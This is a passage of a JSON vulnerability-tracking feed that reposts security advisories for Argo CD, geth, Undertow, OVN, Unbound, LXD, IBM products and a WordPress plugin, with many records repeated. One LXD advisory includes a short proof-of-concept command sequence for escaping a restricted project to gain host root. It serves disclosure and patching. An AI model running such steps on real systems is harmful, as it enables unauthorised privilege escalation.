thanks to Daniel Kayiwa, Samuel Lubwama, Ian Bacher, Rafal Korytkowski, and Michael Seaton. \n\n\ud83d\udccf Published: 2025-01-30T17:50:52Z\n\ud83d\udccf Modified: 2025-01-30T17:50:52Z\n\ud83d\udd17 References:\n1. https://github.com/openmrs/openmrs-core/security/advisories/GHSA-vpxm-cr3r-pjp9\n2. https://github.com/openmrs/openmrs-core", "creation_timestamp": "2025-01-30T18:12:31.000000Z"}, {"uuid": "01cb136c-c762-44de-899b-db36167ecffc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-274V-MGCV-CM8J", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/3502", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-274v-mgcv-cm8j\n\ud83d\udd25 CVSS Score: 5.9 (CVSS_V3)\n\ud83d\udd39 Description: ### Impact\nA vulnerability was discovered in Argo CD that exposed secret values in error messages and the diff view when an invalid Kubernetes Secret resource was synced from a repository. \n\nThe vulnerability assumes the user has write access to the repository and can exploit it, either intentionally or unintentionally, by committing an invalid Secret to repository and triggering a Sync. Once exploited, any user with read access to Argo CD can view the exposed secret data.\n\n### Patches\nA patch for this vulnerability is available in the following Argo CD versions:\n- v2.13.4\n- v2.12.10\n- v2.11.13\n\n### Workarounds\nThere is no workaround other than upgrading.\n\n### References\nFixed with commit https://github.com/argoproj/argo-cd/commit/6f5537bdf15ddbaa0f27a1a678632ff0743e4107 &amp; https://github.com/argoproj/gitops-engine/commit/7e21b91e9d0f64104c8a661f3f390c5e6d73ddca\n\n\ud83d\udccf Published: 2025-01-30T17:51:33Z\n\ud83d\udccf Modified: 2025-01-30T17:51:33Z\n\ud83d\udd17 References:\n1. https://github.com/argoproj/argo-cd/security/advisories/GHSA-47g2-qmh2-749v\n2. https://github.com/argoproj/gitops-engine/security/advisories/GHSA-274v-mgcv-cm8j\n3. https://github.com/argoproj/argo-cd/commit/6f5537bdf15ddbaa0f27a1a678632ff0743e4107\n4. https://github.com/argoproj/gitops-engine/commit/7e21b91e9d0f64104c8a661f3f390c5e6d73ddca\n5. https://github.com/argoproj/gitops-engine", "creation_timestamp": "2025-01-30T18:12:30.000000Z"}, {"uuid": "91313a6d-9a75-45bc-8e82-2a3176f656b4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-47G2-QMH2-749V", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/3502", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-274v-mgcv-cm8j\n\ud83d\udd25 CVSS Score: 5.9 (CVSS_V3)\n\ud83d\udd39 Description: ### Impact\nA vulnerability was discovered in Argo CD that exposed secret values in error messages and the diff view when an invalid Kubernetes Secret resource was synced from a repository. \n\nThe vulnerability assumes the user has write access to the repository and can exploit it, either intentionally or unintentionally, by committing an invalid Secret to repository and triggering a Sync. Once exploited, any user with read access to Argo CD can view the exposed secret data.\n\n### Patches\nA patch for this vulnerability is available in the following Argo CD versions:\n- v2.13.4\n- v2.12.10\n- v2.11.13\n\n### Workarounds\nThere is no workaround other than upgrading.\n\n### References\nFixed with commit https://github.com/argoproj/argo-cd/commit/6f5537bdf15ddbaa0f27a1a678632ff0743e4107 &amp; https://github.com/argoproj/gitops-engine/commit/7e21b91e9d0f64104c8a661f3f390c5e6d73ddca\n\n\ud83d\udccf Published: 2025-01-30T17:51:33Z\n\ud83d\udccf Modified: 2025-01-30T17:51:33Z\n\ud83d\udd17 References:\n1. https://github.com/argoproj/argo-cd/security/advisories/GHSA-47g2-qmh2-749v\n2. https://github.com/argoproj/gitops-engine/security/advisories/GHSA-274v-mgcv-cm8j\n3. https://github.com/argoproj/argo-cd/commit/6f5537bdf15ddbaa0f27a1a678632ff0743e4107\n4. https://github.com/argoproj/gitops-engine/commit/7e21b91e9d0f64104c8a661f3f390c5e6d73ddca\n5. https://github.com/argoproj/gitops-engine", "creation_timestamp": "2025-01-30T18:12:30.000000Z"}, {"uuid": "15ed3a78-abf3-45aa-9dc4-1eee9a25edf8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-274V-MGCV-CM8J", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/3500", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-47g2-qmh2-749v\n\ud83d\udd25 CVSS Score: 5.9 (CVSS_V3)\n\ud83d\udd39 Description: ### Impact\n\nA vulnerability was discovered in Argo CD that exposed secret values in error messages and the diff view when an invalid Kubernetes Secret resource was synced from a repository. \n\nThe vulnerability assumes the user has write access to the repository and can exploit it, either intentionally or unintentionally, by committing an invalid Secret to repository and triggering a Sync. Once exploited, any user with read access to Argo CD can view the exposed secret data.\n\n### Patches\nA patch for this vulnerability is available in the following Argo CD versions:\n- v2.13.4\n- v2.12.10\n- v2.11.13\n\n### Workarounds\nThere is no workaround other than upgrading.\n\n### References\nFixed with commit https://github.com/argoproj/argo-cd/commit/6f5537bdf15ddbaa0f27a1a678632ff0743e4107 &amp; https://github.com/argoproj/gitops-engine/commit/7e21b91e9d0f64104c8a661f3f390c5e6d73ddca\n\n\ud83d\udccf Published: 2025-01-30T17:52:45Z\n\ud83d\udccf Modified: 2025-01-30T17:52:45Z\n\ud83d\udd17 References:\n1. https://github.com/argoproj/argo-cd/security/advisories/GHSA-47g2-qmh2-749v\n2. https://github.com/argoproj/gitops-engine/security/advisories/GHSA-274v-mgcv-cm8j\n3. https://github.com/argoproj/argo-cd/commit/6f5537bdf15ddbaa0f27a1a678632ff0743e4107\n4. https://github.com/argoproj/gitops-engine/commit/7e21b91e9d0f64104c8a661f3f390c5e6d73ddca\n5. https://github.com/argoproj/argo-cd", "creation_timestamp": "2025-01-30T18:12:25.000000Z"}, {"uuid": "3a37798e-713e-4b04-9996-d7a2f3c82c0a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-Q26P-9CQ4-7FC2", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/3501", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-q26p-9cq4-7fc2\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: ### Impact\n\nA vulnerable node can be forced to shutdown/crash using a specially crafted message.\n\nMore in-depth details will be released at a later time.\n\n### Patches\n\nA fix has been included in geth version 1.14.13 and onwards.\n\n### Workarounds\n\nUnfortunately, no workaround is available.\n\n### Credits\n\nThis issue was originally reported to Polygon Security by David Matosse (@iam-ned).\n\n\ud83d\udccf Published: 2025-01-30T17:51:57Z\n\ud83d\udccf Modified: 2025-01-30T17:51:57Z\n\ud83d\udd17 References:\n1. https://github.com/ethereum/go-ethereum/security/advisories/GHSA-q26p-9cq4-7fc2\n2. https://github.com/ethereum/go-ethereum", "creation_timestamp": "2025-01-30T18:12:26.000000Z"}, {"uuid": "f34037b9-4740-4823-926d-12c7254ce8d7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1194", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5443", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-6162\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A vulnerability was found in Undertow, where URL-encoded request paths can be mishandled during concurrent requests on the AJP listener. This issue arises because the same buffer is used to decode the paths for multiple requests simultaneously, leading to incorrect path information being processed. As a result, the server may attempt to access the wrong path, causing errors such as \"404 Not Found\" or other application failures. This flaw can potentially lead to a denial of service, as legitimate resources become inaccessible due to the path mix-up.\n\ud83d\udccf Published: 2024-06-20T14:33:10.342Z\n\ud83d\udccf Modified: 2025-02-26T02:40:52.058Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1194\n2. https://access.redhat.com/errata/RHSA-2024:4386\n3. https://access.redhat.com/errata/RHSA-2024:4884\n4. https://access.redhat.com/security/cve/CVE-2024-6162\n5. https://bugzilla.redhat.com/show_bug.cgi?id=2293069\n6. https://issues.redhat.com/browse/JBEAP-26268", "creation_timestamp": "2025-02-26T03:24:44.000000Z"}, {"uuid": "b4136ef4-1053-4b21-9ce8-d95222627f5f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:4386", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5443", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-6162\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A vulnerability was found in Undertow, where URL-encoded request paths can be mishandled during concurrent requests on the AJP listener. This issue arises because the same buffer is used to decode the paths for multiple requests simultaneously, leading to incorrect path information being processed. As a result, the server may attempt to access the wrong path, causing errors such as \"404 Not Found\" or other application failures. This flaw can potentially lead to a denial of service, as legitimate resources become inaccessible due to the path mix-up.\n\ud83d\udccf Published: 2024-06-20T14:33:10.342Z\n\ud83d\udccf Modified: 2025-02-26T02:40:52.058Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1194\n2. https://access.redhat.com/errata/RHSA-2024:4386\n3. https://access.redhat.com/errata/RHSA-2024:4884\n4. https://access.redhat.com/security/cve/CVE-2024-6162\n5. https://bugzilla.redhat.com/show_bug.cgi?id=2293069\n6. https://issues.redhat.com/browse/JBEAP-26268", "creation_timestamp": "2025-02-26T03:24:44.000000Z"}, {"uuid": "5fa081a2-9528-4063-acd0-045b23279dab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:1089", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5477", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-0650\n\ud83d\udd25 CVSS Score: 8.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A flaw was found in the Open Virtual Network (OVN). Specially crafted UDP packets may bypass egress access control lists (ACLs) in OVN installations configured with a logical switch with DNS records set on it and if the same switch has any egress ACLs configured. This issue can lead to unauthorized access to virtual machines and containers running on the OVN network.\n\ud83d\udccf Published: 2025-01-23T16:34:31.390Z\n\ud83d\udccf Modified: 2025-02-26T06:53:05.605Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:1083\n2. https://access.redhat.com/errata/RHSA-2025:1084\n3. https://access.redhat.com/errata/RHSA-2025:1085\n4. https://access.redhat.com/errata/RHSA-2025:1086\n5. https://access.redhat.com/errata/RHSA-2025:1087\n6. https://access.redhat.com/errata/RHSA-2025:1088\n7. https://access.redhat.com/errata/RHSA-2025:1089\n8. https://access.redhat.com/errata/RHSA-2025:1090\n9. https://access.redhat.com/errata/RHSA-2025:1091\n10. https://access.redhat.com/errata/RHSA-2025:1092\n11. https://access.redhat.com/errata/RHSA-2025:1093\n12. https://access.redhat.com/errata/RHSA-2025:1094\n13. https://access.redhat.com/errata/RHSA-2025:1095\n14. https://access.redhat.com/errata/RHSA-2025:1096\n15. https://access.redhat.com/errata/RHSA-2025:1097\n16. https://access.redhat.com/security/cve/CVE-2025-0650\n17. https://bugzilla.redhat.com/show_bug.cgi?id=2339537\n18. https://www.openwall.com/lists/oss-security/2025/01/22/5", "creation_timestamp": "2025-02-26T07:24:00.000000Z"}, {"uuid": "088acc69-5ebc-4593-a4ec-72bf16850515", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-X9QQ-236J-GJ97", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/3520", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-x9qq-236j-gj97\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: ### Summary\n\nIf a user has restricted access to a project that is configured with `restricted=true`, they can gain root access on the system by creating a disk device with `shift=true` and creating a setuid root executable. This is possible because the `shift` property is not restricted unless `restricted.devices.disk.paths` is set.\n\n### Details\n\nThe following patch shows the offending code with a possible fix:\n```patch\n--- a/lxd/device/disk.go\n+++ b/lxd/device/disk.go\n@@ -429,17 +429,19 @@ func (d *disk) validateEnvironmentSourcePath() error {\n        if instProject.Name != api.ProjectDefaultName {\n                // If restricted disk paths are in force, then check the disk's source is allowed, and record the\n                // allowed parent path for later user during device start up sequence.\n-               if shared.IsTrue(instProject.Config[\"restricted\"]) &amp;&amp; instProject.Config[\"restricted.devices.disk.paths\"] != \"\" {\n-                       allowed, restrictedParentSourcePath := project.CheckRestrictedDevicesDiskPaths(instProject.Config, d.config[\"source\"])\n-                       if !allowed {\n-                               return fmt.Errorf(\"Disk source path %q not allowed by project for disk %q\", d.config[\"source\"], d.name)\n+               if shared.IsTrue(instProject.Config[\"restricted\"]) {\n+                       if instProject.Config[\"restricted.devices.disk.paths\"] != \"\" {\n+                               allowed, restrictedParentSourcePath := project.CheckRestrictedDevicesDiskPaths(instProject.Config, d.config[\"source\"])\n+                               if !allowed {\n+                                       return fmt.Errorf(\"Disk source path %q not allowed by project for disk %q\", d.config[\"source\"], d.name)\n+                               }\n+\n+                               d.restrictedParentSourcePath = shared.HostPath(restrictedParentSourcePath)\n                        }\n\n                        if shared.IsTrue(d.config[\"shift\"]) {\n                                return fmt.Errorf(`The \"shift\" property cannot be used with a restricted source path`)\n                        }\n-\n-                       d.restrictedParentSourcePath = shared.HostPath(restrictedParentSourcePath)\n                }\n        }\n```\n\n### PoC\n\n```bash\n$ lxc project create restricted -c restricted=true -c restricted.devices.disk=allow\n$ lxc project switch restricted\n$ lxc profile device add default root disk path=/ pool=default\n$ lxc init ubuntu:22.04 c1\n$ lxc config device add c1 d1 disk source=/ path=/mnt shift=true\n$ lxc start c1  # no error\n\n$ lxc project set restricted restricted.devices.disk.paths=/  # explicitly allow mounting /\n$ lxc restart c1\nError: Failed to start device \"d1\": The \"shift\" property cannot be used with a restricted source path\n```\n\nCreated https://github.com/canonical/lxd/issues/12606 to improve the documentation as per https://github.com/canonical/lxd/security/advisories/GHSA-x9qq-236j-gj97#advisory-comment-91918\n\ud83d\udccf Published: 2023-12-05T23:32:58Z\n\ud83d\udccf Modified: 2025-01-30T22:49:12Z\n\ud83d\udd17 References:\n1. https://github.com/canonical/lxd/security/advisories/GHSA-x9qq-236j-gj97\n2. https://github.com/canonical/lxd/issues/12606\n3. https://github.com/canonical/lxd/commit/ce1bd0dd37bb3810fe6f16c237a4b65257f231f1\n4. https://github.com/canonical/lxd", "creation_timestamp": "2025-01-30T23:12:34.000000Z"}, {"uuid": "56c36a8e-ab09-4d98-aaff-3264488426b4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1802", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/3545", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1488\n\ud83d\udd25 CVSS Score: 8.0 (CVSS_V3)\n\ud83d\udd39 Description: A vulnerability was found in Unbound due to incorrect default permissions, allowing any process outside the unbound group to modify the unbound runtime configuration. If a process can connect over localhost to port 8953, it can alter the configuration of unbound.service. This flaw allows an unprivileged attacker to manipulate a running instance, potentially altering forwarders, allowing them to track all queries forwarded by the local resolver, and, in some cases, disrupting resolving altogether.\n\ud83d\udccf Published: 2024-02-15T06:31:35Z\n\ud83d\udccf Modified: 2025-01-31T00:30:43Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-1488\n2. https://access.redhat.com/errata/RHSA-2024:1750\n3. https://access.redhat.com/errata/RHSA-2024:1751\n4. https://access.redhat.com/errata/RHSA-2024:1780\n5. https://access.redhat.com/errata/RHSA-2024:1801\n6. https://access.redhat.com/errata/RHSA-2024:1802\n7. https://access.redhat.com/errata/RHSA-2024:1804\n8. https://access.redhat.com/errata/RHSA-2024:2587\n9. https://access.redhat.com/errata/RHSA-2024:2696\n10. https://access.redhat.com/errata/RHSA-2025:0837\n11. https://access.redhat.com/security/cve/CVE-2024-1488\n12. https://bugzilla.redhat.com/show_bug.cgi?id=2264183", "creation_timestamp": "2025-01-31T01:12:29.000000Z"}, {"uuid": "ef600ed9-5f8c-4bd3-acd0-ebbd84dae99c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:2696", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/3545", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1488\n\ud83d\udd25 CVSS Score: 8.0 (CVSS_V3)\n\ud83d\udd39 Description: A vulnerability was found in Unbound due to incorrect default permissions, allowing any process outside the unbound group to modify the unbound runtime configuration. If a process can connect over localhost to port 8953, it can alter the configuration of unbound.service. This flaw allows an unprivileged attacker to manipulate a running instance, potentially altering forwarders, allowing them to track all queries forwarded by the local resolver, and, in some cases, disrupting resolving altogether.\n\ud83d\udccf Published: 2024-02-15T06:31:35Z\n\ud83d\udccf Modified: 2025-01-31T00:30:43Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-1488\n2. https://access.redhat.com/errata/RHSA-2024:1750\n3. https://access.redhat.com/errata/RHSA-2024:1751\n4. https://access.redhat.com/errata/RHSA-2024:1780\n5. https://access.redhat.com/errata/RHSA-2024:1801\n6. https://access.redhat.com/errata/RHSA-2024:1802\n7. https://access.redhat.com/errata/RHSA-2024:1804\n8. https://access.redhat.com/errata/RHSA-2024:2587\n9. https://access.redhat.com/errata/RHSA-2024:2696\n10. https://access.redhat.com/errata/RHSA-2025:0837\n11. https://access.redhat.com/security/cve/CVE-2024-1488\n12. https://bugzilla.redhat.com/show_bug.cgi?id=2264183", "creation_timestamp": "2025-01-31T01:12:29.000000Z"}, {"uuid": "3b173a3c-ff89-4538-b38f-78f7a6964dd7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:2587", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/3545", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1488\n\ud83d\udd25 CVSS Score: 8.0 (CVSS_V3)\n\ud83d\udd39 Description: A vulnerability was found in Unbound due to incorrect default permissions, allowing any process outside the unbound group to modify the unbound runtime configuration. If a process can connect over localhost to port 8953, it can alter the configuration of unbound.service. This flaw allows an unprivileged attacker to manipulate a running instance, potentially altering forwarders, allowing them to track all queries forwarded by the local resolver, and, in some cases, disrupting resolving altogether.\n\ud83d\udccf Published: 2024-02-15T06:31:35Z\n\ud83d\udccf Modified: 2025-01-31T00:30:43Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-1488\n2. https://access.redhat.com/errata/RHSA-2024:1750\n3. https://access.redhat.com/errata/RHSA-2024:1751\n4. https://access.redhat.com/errata/RHSA-2024:1780\n5. https://access.redhat.com/errata/RHSA-2024:1801\n6. https://access.redhat.com/errata/RHSA-2024:1802\n7. https://access.redhat.com/errata/RHSA-2024:1804\n8. https://access.redhat.com/errata/RHSA-2024:2587\n9. https://access.redhat.com/errata/RHSA-2024:2696\n10. https://access.redhat.com/errata/RHSA-2025:0837\n11. https://access.redhat.com/security/cve/CVE-2024-1488\n12. https://bugzilla.redhat.com/show_bug.cgi?id=2264183", "creation_timestamp": "2025-01-31T01:12:29.000000Z"}, {"uuid": "0ba3c111-ccd6-4048-b17f-6002372ac92f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1801", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/3545", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1488\n\ud83d\udd25 CVSS Score: 8.0 (CVSS_V3)\n\ud83d\udd39 Description: A vulnerability was found in Unbound due to incorrect default permissions, allowing any process outside the unbound group to modify the unbound runtime configuration. If a process can connect over localhost to port 8953, it can alter the configuration of unbound.service. This flaw allows an unprivileged attacker to manipulate a running instance, potentially altering forwarders, allowing them to track all queries forwarded by the local resolver, and, in some cases, disrupting resolving altogether.\n\ud83d\udccf Published: 2024-02-15T06:31:35Z\n\ud83d\udccf Modified: 2025-01-31T00:30:43Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-1488\n2. https://access.redhat.com/errata/RHSA-2024:1750\n3. https://access.redhat.com/errata/RHSA-2024:1751\n4. https://access.redhat.com/errata/RHSA-2024:1780\n5. https://access.redhat.com/errata/RHSA-2024:1801\n6. https://access.redhat.com/errata/RHSA-2024:1802\n7. https://access.redhat.com/errata/RHSA-2024:1804\n8. https://access.redhat.com/errata/RHSA-2024:2587\n9. https://access.redhat.com/errata/RHSA-2024:2696\n10. https://access.redhat.com/errata/RHSA-2025:0837\n11. https://access.redhat.com/security/cve/CVE-2024-1488\n12. https://bugzilla.redhat.com/show_bug.cgi?id=2264183", "creation_timestamp": "2025-01-31T01:12:29.000000Z"}, {"uuid": "34aa704a-fc81-41e1-9522-8c7bf91e0829", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1804", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/3545", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1488\n\ud83d\udd25 CVSS Score: 8.0 (CVSS_V3)\n\ud83d\udd39 Description: A vulnerability was found in Unbound due to incorrect default permissions, allowing any process outside the unbound group to modify the unbound runtime configuration. If a process can connect over localhost to port 8953, it can alter the configuration of unbound.service. This flaw allows an unprivileged attacker to manipulate a running instance, potentially altering forwarders, allowing them to track all queries forwarded by the local resolver, and, in some cases, disrupting resolving altogether.\n\ud83d\udccf Published: 2024-02-15T06:31:35Z\n\ud83d\udccf Modified: 2025-01-31T00:30:43Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-1488\n2. https://access.redhat.com/errata/RHSA-2024:1750\n3. https://access.redhat.com/errata/RHSA-2024:1751\n4. https://access.redhat.com/errata/RHSA-2024:1780\n5. https://access.redhat.com/errata/RHSA-2024:1801\n6. https://access.redhat.com/errata/RHSA-2024:1802\n7. https://access.redhat.com/errata/RHSA-2024:1804\n8. https://access.redhat.com/errata/RHSA-2024:2587\n9. https://access.redhat.com/errata/RHSA-2024:2696\n10. https://access.redhat.com/errata/RHSA-2025:0837\n11. https://access.redhat.com/security/cve/CVE-2024-1488\n12. https://bugzilla.redhat.com/show_bug.cgi?id=2264183", "creation_timestamp": "2025-01-31T01:12:29.000000Z"}, {"uuid": "70c2784c-6daf-450a-afcb-48b6c06ac653", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:0837", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/3545", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1488\n\ud83d\udd25 CVSS Score: 8.0 (CVSS_V3)\n\ud83d\udd39 Description: A vulnerability was found in Unbound due to incorrect default permissions, allowing any process outside the unbound group to modify the unbound runtime configuration. If a process can connect over localhost to port 8953, it can alter the configuration of unbound.service. This flaw allows an unprivileged attacker to manipulate a running instance, potentially altering forwarders, allowing them to track all queries forwarded by the local resolver, and, in some cases, disrupting resolving altogether.\n\ud83d\udccf Published: 2024-02-15T06:31:35Z\n\ud83d\udccf Modified: 2025-01-31T00:30:43Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-1488\n2. https://access.redhat.com/errata/RHSA-2024:1750\n3. https://access.redhat.com/errata/RHSA-2024:1751\n4. https://access.redhat.com/errata/RHSA-2024:1780\n5. https://access.redhat.com/errata/RHSA-2024:1801\n6. https://access.redhat.com/errata/RHSA-2024:1802\n7. https://access.redhat.com/errata/RHSA-2024:1804\n8. https://access.redhat.com/errata/RHSA-2024:2587\n9. https://access.redhat.com/errata/RHSA-2024:2696\n10. https://access.redhat.com/errata/RHSA-2025:0837\n11. https://access.redhat.com/security/cve/CVE-2024-1488\n12. https://bugzilla.redhat.com/show_bug.cgi?id=2264183", "creation_timestamp": "2025-01-31T01:12:29.000000Z"}, {"uuid": "28001766-ba79-482d-aff5-77d64e6a7df9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JHJ5-WGM2-6MQF", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/3154", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-jhj5-wgm2-6mqf\n\ud83d\udd25 CVSS Score: 2.3 (CVSS_V3)\n\ud83d\udd39 Description: IBM Security Directory Integrator 7.2.0 and IBM Security Verify Directory Integrator 10.0.0 could disclose sensitive information about directory contents that could aid in further attacks against the system.\n\ud83d\udccf Published: 2025-01-27T03:30:26Z\n\ud83d\udccf Modified: 2025-01-27T03:30:26Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-28766\n2. https://www.ibm.com/support/pages/node/7161444", "creation_timestamp": "2025-01-27T04:07:36.000000Z"}, {"uuid": "622ff2b6-c9f4-4615-98ee-4129bd8b61b6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-V9F7-MHWH-HFH9", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/3158", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-v9f7-mhwh-hfh9\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: The Altra Side Menu WordPress plugin through 2.0 does not sanitize and escape a parameter before using it in a SQL statement, allowing admins to perform SQL injection attacks\n\ud83d\udccf Published: 2025-01-27T06:30:26Z\n\ud83d\udccf Modified: 2025-01-27T06:30:26Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-12773\n2. https://wpscan.com/vulnerability/fab64105-599f-49a4-b01d-c873ff34b590", "creation_timestamp": "2025-01-27T07:07:46.000000Z"}, {"uuid": "2f8bc295-44b3-4088-a27a-cadd658a5863", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RC6V-G84G-9P25", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/3157", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-rc6v-g84g-9p25\n\ud83d\udd25 CVSS Score: 5.3 (CVSS_V3)\n\ud83d\udd39 Description: IBM InfoSphere Master Data Management 11.6, 12.0, and 14.0 is vulnerable to stored cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session.\n\ud83d\udccf Published: 2025-01-27T03:30:25Z\n\ud83d\udccf Modified: 2025-01-27T03:30:25Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2023-46187\n2. https://www.ibm.com/support/pages/node/7173892", "creation_timestamp": "2025-01-27T04:07:38.000000Z"}, {"uuid": "77cf1b25-8395-4bce-94ec-4a21f573fe80", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-75J3-GFF7-55X3", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/3156", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: 